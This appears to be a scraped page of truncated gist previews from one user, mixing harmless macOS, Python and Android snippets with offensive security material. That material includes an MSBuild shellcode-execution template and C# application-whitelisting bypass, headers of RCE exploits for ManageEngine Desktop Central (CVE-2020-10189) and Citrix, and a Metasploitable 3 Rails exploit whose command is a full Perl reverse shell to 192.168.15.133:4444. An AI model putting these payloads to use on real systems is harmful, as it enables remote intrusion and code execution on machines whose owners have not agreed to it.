pich4ya

# Automatically enable Macbook Pro's Touch ID for sudo after MacOS version upgrade
sudotouchid () {
	if ! /usr/bin/grep -Fq "pam_tid.so" /etc/pam.d/sudo 
	then
    # Use Touch ID to enable Touch ID for sudo
		/usr/bin/osascript -e 'do shell script "/usr/bin/sed -i '' -e \"1s/^//p; 1s/^.*/auth       sufficient     pam_tid.so/\" /etc/pam.d/sudo" with administrator privileges'
	fi
}
sudotouchid

pich4ya

# -*- coding: utf-8 -*-
#!/usr/bin/env python
# https://python-binance.readthedocs.io/en/latest/
# apt install python3-pip
# pip3 install python-binance requests
import requests
from binance.client import Client
import json
import decimal
import datetime

pich4ya

# @author Pichaya Morimoto ([email protected])
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# วิธี mitm ดัก Web API ของ iOS App ผ่าน MacOS -> Burp Suite ที่เป็น unaware proxy 
# (เช่น Xamarin, Flutter ที่ไม่วิ่งผ่าน System Proxy ไม่ใช้ default Cert Store ใน iPhone)
# ถ้าเป็นแอปปกติ ที่ใช้ system proxy อยู่แล้วไม่ต้องทำท่านี้ก็ได้ ตั้ง proxy ปกติไปได้เลย

1. เสียบ iPhone (ที่ jailbreak แล้ว) กับ MBP ผ่าน USB แล้วใช้ iproxy ตั้งให้ local port 8080 บน iPhone วิ่งเข้า local port 8080 บน MBP ด้วย ssh reverse tunnel (-R)
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 [email protected] -N -f

pich4ya

#!/usr/bin/env bash

ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"

BAD_ENV_PATHS="/usr/local"

echo "Ensure the root of the broken virtualenv:"
echo "    $ENV_PATH"

pich4ya

@author LongCat (Pichaya Morimoto)

1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"

Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)

Connect Pixel 3a to MBP > allow access in the device's prompt.

pich4ya

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
	  <Target Name="Hello">
	    <ClassExample />
	  </Target>
	  <UsingTask

pich4ya

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
　
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

pich4ya

#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability

Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189

pich4ya

# @author Pichaya Morimoto ([email protected])
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests

# 1. tmp upload

host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"

pich4ya

import requests
import sys
import time

append_value = str(time.time())

print "# By 0x09AL - MDSec ActiveBreach \n"

def upload_file(url,payload):
	endpoint = url + "/vpns/portal/scripts/newbm.pl"